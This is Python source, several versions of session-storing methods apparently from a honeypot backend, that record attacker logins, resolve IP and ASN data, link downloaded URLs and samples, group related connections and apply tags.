def get_ip_range_online(self, ip): addinfo = additionalinfo.get_ip_info(ip) # TODO: Ugly hack range = IPRange(ip_min=1, ip_max=2) range.country = addinfo["country"] range.city = "" range.latitude = 0 range.longitude = 0 range.asn_id = int(addinfo["asn"]) range.asn = self._get_asn(range.asn_id) range.cidr = addinfo["ipblock"] return range
def put_session(self, session): ipinfo = get_ip_info(session["ip"]) asn = None block = None country = None if ipinfo: asn_obj = self.get_asn(ipinfo["asn"]) asn = ipinfo["asn"] block = ipinfo["ipblock"] country = ipinfo["country"] s_id = self.db.put_conn(session["ip"], session["user"], session["pass"], session["date"], session["text_combined"], asn, block, country) req_urls = [] for url in session["urls"]: db_url = self.db.get_url(url).fetchone() url_id = 0 if db_url == None: url_ip, url_info = get_url_info(url) url_asn = None url_country = None if url_info: asn_obj_url = self.get_asn(url_info["asn"]) url_asn = url_info["asn"] url_country = url_info["country"] url_id = self.db.put_url(url, session["date"], url_ip, url_asn, url_country) req_urls.append(url) elif db_url["sample"] == None: req_urls.append(url) url_id = db_url["id"] else: # Sample exists already # TODO: Check url for oldness url_id = db_url["id"] self.db.link_conn_url(s_id, url_id) return req_urls
def get_ip_range_online(self, ip): addinfo = additionalinfo.get_ip_info(ip) if addinfo: # TODO: Ugly hack range = type('', (object, ), {})() range.country = addinfo["country"] range.city = "Unknown" range.latitude = 0 range.longitude = 0 range.asn_id = int(addinfo["asn"]) range.asn = self._get_asn(range.asn_id) range.cidr = addinfo["ipblock"] return range else: return None
def put_session(self, session): ipinfo = None asn = None block = None country = None if self.do_ip_to_asn_resolution: ipinfo = get_ip_info(session["ip"]) if ipinfo: asn_obj = self.get_asn(ipinfo["asn"]) asn = ipinfo["asn"] block = ipinfo["ipblock"] country = ipinfo["country"] report = {} if self.vt != None: if self.web.get_ip_report(session["ip"]) == None: report = self.vt.query_ip_reports(session["ip"]) ipReport = IpReport(ip=session["ip"], report=json.dumps(report)) self.session.add(ipReport) # Calculate "hash" connhash = "" for event in session["stream"]: if event["in"]: line = event["data"] line = ''.join(char for char in line if ord(char) < 128 and ord(char) > 32) if line != "": linehash = abs(hash(line)) % 0xFFFF connhash += struct.pack("!H", linehash) connhash = connhash.encode("hex") backend_user = self.session.query(User).filter( User.username == session["backend_username"]).first() conn = Connection(ip=session["ip"], user=session["user"], date=session["date"], password=session["pass"], stream=json.dumps(session["stream"]), asn_id=asn, ipblock=block, country=country, connhash=connhash, backend_user_id=backend_user.id) self.session.add(conn) self.session.flush() req_urls = [] set_urls = set(session["urls"]) for url in set_urls: db_url = self.db.get_url(url).fetchone() url_id = 0 report = '' parsed_uri = urlparse(url) domain = '{uri.netloc}'.format(uri=parsed_uri) if self.vt != None: report = self.vt.query_domain_reports(domain) domainReport = DomainReport(domain=domain, report=json.dumps(report)) self.session.add(domainReport) if db_url == None: url_ip = None url_asn = None url_country = None if self.do_ip_to_asn_resolution: url_ip, url_info = get_url_info(url) if url_info: asn_obj_url = self.get_asn(url_info["asn"]) url_asn = url_info["asn"] url_country = url_info["country"] url_id = self.db.put_url(url, session["date"], url_ip, url_asn, url_country) req_urls.append(url) elif db_url["sample"] == None: req_urls.append(url) url_id = db_url["id"] else: # Sample exists already # TODO: Check url for oldness url_id = db_url["id"] self.db.link_conn_url(conn.id, url_id) # Find previous connections # A connection is associated when: # - same honeypot/user # - connection happened as long as 120s before # - same client ip OR same username/password combo assoc_timediff = 120 previous_conns = (self.session.query(Connection).filter( Connection.date > (conn.date - assoc_timediff), or_( and_(Connection.user == conn.user, Connection.password == conn.password), Connection.ip == conn.ip), Connection.backend_user_id == conn.backend_user_id, Connection.id != conn.id).all()) for prev in previous_conns: conn.conns_before.append(prev) # Check connection against all tags tags = self.session.query(Tag).all() conn = self.session.query(Connection).filter( Connection.id == conn.id).first() for tag in tags: json_obj = conn.json(depth=0) json_obj["text_combined"] = filter_ascii(json_obj["text_combined"]) if simple_eval(tag.code, names=json_obj) == True: self.db.link_conn_tag(conn.id, tag.id) return req_urls
def put_session(self, session): ipinfo = None asn = None block = None country = None network_id = None if self.do_ip_to_asn_resolution: ipinfo = get_ip_info(session["ip"]) if ipinfo: asn_obj = self.get_asn(ipinfo["asn"]) asn = ipinfo["asn"] block = ipinfo["ipblock"] country = ipinfo["country"] # Calculate "hash" connhash = "" for event in session["stream"]: if event["in"]: line = event["data"] line = ''.join(char for char in line if ord(char) < 128 and ord(char) > 32) if line != "": linehash = abs(hash(line)) % 0xFFFF connhash += struct.pack("!H", linehash) connhash = connhash.encode("hex") backend_user = self.session.query(User).filter( User.username == session["backend_username"]).first() conn = Connection(ip=session["ip"], user=session["user"], date=session["date"], password=session["pass"], stream=json.dumps(session["stream"]), asn_id=asn, ipblock=block, country=country, connhash=connhash, backend_user_id=backend_user.id) self.session.add(conn) self.session.flush() # to get id samples = [] urls = [] for sample_json in session["samples"]: sample, url = self.create_url_sample(sample_json) if network_id == None and sample.network_id != None: network_id = sample.network_id if network_id == None and url.network_id != None: network_id = url.network_id conn.urls.append(url) samples.append(sample) urls.append(url) # Find previous connections # A connection is associated when: # - same honeypot/user # - connection happened as long as 120s before # - same client ip OR same username/password combo assoc_timediff = 120 previous_conns = (self.session.query(Connection).filter( Connection.date > (conn.date - assoc_timediff), or_( and_(Connection.user == conn.user, Connection.password == conn.password), Connection.ip == conn.ip), Connection.backend_user_id == conn.backend_user_id, Connection.id != conn.id).all()) for prev in previous_conns: if network_id == None and prev.network_id != None: network_id = prev.network_id conn.conns_before.append(prev) # Check connection against all tags tags = self.session.query(Tag).all() for tag in tags: json_obj = conn.json(depth=0) json_obj["text_combined"] = filter_ascii(json_obj["text_combined"]) if simple_eval(tag.code, names=json_obj) == True: self.db.link_conn_tag(conn.id, tag.id) # Only create new networks for connections with urls or associtaed conns, # to prevent the creation of thousands of networks # NOTE: only conns with network == NULL will get their network updated # later so whe should only create a network where we cannot easily # change it later if (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None: network_id = self.create_network().id # Update network on self conn.network_id = network_id # Update network on all added Urls for url in urls: if url.network_id == None: url.network_id = network_id # Update network on all added Samples for sample in samples: if sample.network_id == None: sample.network_id = network_id # Update network on all previous connections withut one if network_id != None: for prev in previous_conns: if prev.network_id == None: prev.network_id = network_id self.session.flush() return []
def put_session(self, session): ipinfo = get_ip_info(session["ip"]) asn = None block = None country = None if ipinfo: asn_obj = self.get_asn(ipinfo["asn"]) asn = ipinfo["asn"] block = ipinfo["ipblock"] country = ipinfo["country"] # Calculate "hash" connhash = "" for line in session["text_in"].split("\n"): line = line.strip() linehash = abs(hash(line)) % 0xFFFF connhash += struct.pack("!H", linehash) connhash = connhash.encode("hex") backend_user = self.session.query(User).filter( User.username == session["backend_username"]).first() conn = Connection(ip=session["ip"], user=session["user"], date=session["date"], password=session["pass"], text_combined=session["text_combined"], asn_id=asn, ipblock=block, country=country, connhash=connhash, backend_user_id=backend_user.id) self.session.add(conn) self.session.flush() req_urls = [] for url in session["urls"]: db_url = self.db.get_url(url).fetchone() url_id = 0 if db_url == None: url_ip, url_info = get_url_info(url) url_asn = None url_country = None if url_info: asn_obj_url = self.get_asn(url_info["asn"]) url_asn = url_info["asn"] url_country = url_info["country"] url_id = self.db.put_url(url, session["date"], url_ip, url_asn, url_country) req_urls.append(url) elif db_url["sample"] == None: req_urls.append(url) url_id = db_url["id"] else: # Sample exists already # TODO: Check url for oldness url_id = db_url["id"] self.db.link_conn_url(conn.id, url_id) # Find previous connections # A connection is associated when: # - same honeypot/user # - connection happened as long as 120s before # - same client ip OR same username/password combo assoc_timediff = 120 previous_conns = (self.session.query(Connection).filter( Connection.date > (conn.date - assoc_timediff), or_( and_(Connection.user == conn.user, Connection.password == conn.password), Connection.ip == conn.ip), Connection.backend_user_id == conn.backend_user_id, Connection.id != conn.id).all()) for prev in previous_conns: conn.conns_before.append(prev) # Check connection against all tags tags = self.session.query(Tag).all() conn = self.session.query(Connection).filter( Connection.id == conn.id).first() for tag in tags: json_obj = conn.json(depth=0) json_obj["text_combined"] = filter_ascii(json_obj["text_combined"]) if simple_eval(tag.code, names=json_obj) == True: self.db.link_conn_tag(conn.id, tag.id) return req_urls